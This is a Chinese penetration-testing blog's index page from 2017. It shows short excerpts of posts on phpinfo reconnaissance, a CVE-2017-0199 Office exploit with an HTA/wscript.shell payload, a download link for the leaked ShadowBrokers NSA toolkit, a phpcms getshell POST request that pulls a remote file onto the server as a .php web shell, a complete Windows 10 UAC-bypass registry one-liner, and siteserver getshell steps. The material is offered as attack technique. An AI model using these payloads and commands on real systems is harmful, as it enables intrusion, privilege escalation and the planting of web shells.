热门 从phpinfo中能获取哪些敏感信息

时间:2017-4-23   作者:webbaozi   分类: 渗透测试   热度:1034°    
时间:2017-4-23   分类: 渗透测试    热度:1034  
phpinfo()想必的最熟悉的了,在搭建环境之后都会随后写一个phpinfo()来测试环境是否正常,很多人测试完毕忘记删除就开始部署环境了,这就造成了一些敏感信息的泄漏。那么我们能从phpinfo()中获得哪些敏感信息呢?php版本这种就不用说了,来看一下泄漏了哪些比较敏感的信息。 一、绝对路径(_SERVER[“SCRIPT_FILENAME”]) 这个是最常用,也是最有效的一个办法,找到phpinfo()页面可以直接找到网站的绝对路径,对于写shell和信息搜集是必不可少的。 二、支持的程序 可以通过phpinfo()查...

阅读全文>>

热门 CVE-2017-0199 OFFICE OLE2LINK漏洞利用详解

时间:2017-4-18   作者:webbaozi   分类: 渗透测试   热度:1154°    
时间:2017-4-18   分类: 渗透测试    热度:1154  
漏洞概述 fireeye最近公布了一个OFFICE 0day,在无需用户交互的情况下,打开word文档就可以通过hta脚本执行任意代码。经过研究发现,此漏洞的成因主要是word在处理内嵌OLE2LINK对象时,通过网络更新对象时没有正确处理的Content-Type所导致的一个逻辑漏洞。 漏洞利用方法 首先准备一台apache服务器,web根目录下保存一个1.rtf文件,内容如下: test789 <script> var objShell = new ActiveXObject("wscript.shell"); objSh...

阅读全文>>

热门 ShadowBrokers 泄漏的美国 NSA 黑客工具包下载地址及复现

时间:2017-4-16   作者:webbaozi   分类: 渗透测试   热度:2683°    
时间:2017-4-16   分类: 渗透测试    热度:2683  
方程式0day的下载地址: https://github.com/misterch0c/shadowbroker 本次公开的工具包中,包含多个 Windows 漏洞的利用工具,只要Windows服务器开了25、88、139、445、3389 等端口之一,就有可能被黑客攻击,其中影响尤为严重的是445和3389端口。 复现过程,收集的网上的(自己电脑太差,虚拟机运行不了那么多。so,看看网上的吧) 方程式 0day ETERNALBLUE  复现过程 视频教程 ETERNALBLUE 本地复...

阅读全文>>

热门 phpcms前台getshell(附:注入)

时间:2017-4-10   作者:webbaozi   分类: 渗透测试   热度:2105°    
时间:2017-4-10   分类: 渗透测试    热度:2105  
1.phpcms文件上传,需要网站开启注册功能 http://192.168.107.138/phpcms/index.php?m=member&c=index&a=register&siteid=1 POST:siteid=1&modelid=11&username=123456&password=123456&[email protected]&info[content]=<img src=http://www.webbaozi.com/phpcmsv9/v9.txt?.php#.jpg>...

阅读全文>>

热门 bypassuac收集

时间:2017-4-8   作者:webbaozi   分类: 个人笔记   热度:548°    
时间:2017-4-8   分类: 个人笔记    热度:548  
window10: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /t REG_SZ /d %COMSPEC% /f sdclt reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f

阅读全文>>

热门 siteserver简单getshell

时间:2017-3-10   作者:webbaozi   分类: 渗透测试   热度:1370°    
时间:2017-3-10   分类: 渗透测试    热度:1370  
1.忘记密码处 1.1登录确定账号   1.2点击忘记密码 然后回答问题,随便填写一个然后抓包,删除填写的内容     然后放包。         2.文件上传 http://wooyun.webbaozi.com/static/bugs/wooyun-2014-053085.html 首先勾选上返回包。   访问地址:htt...

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1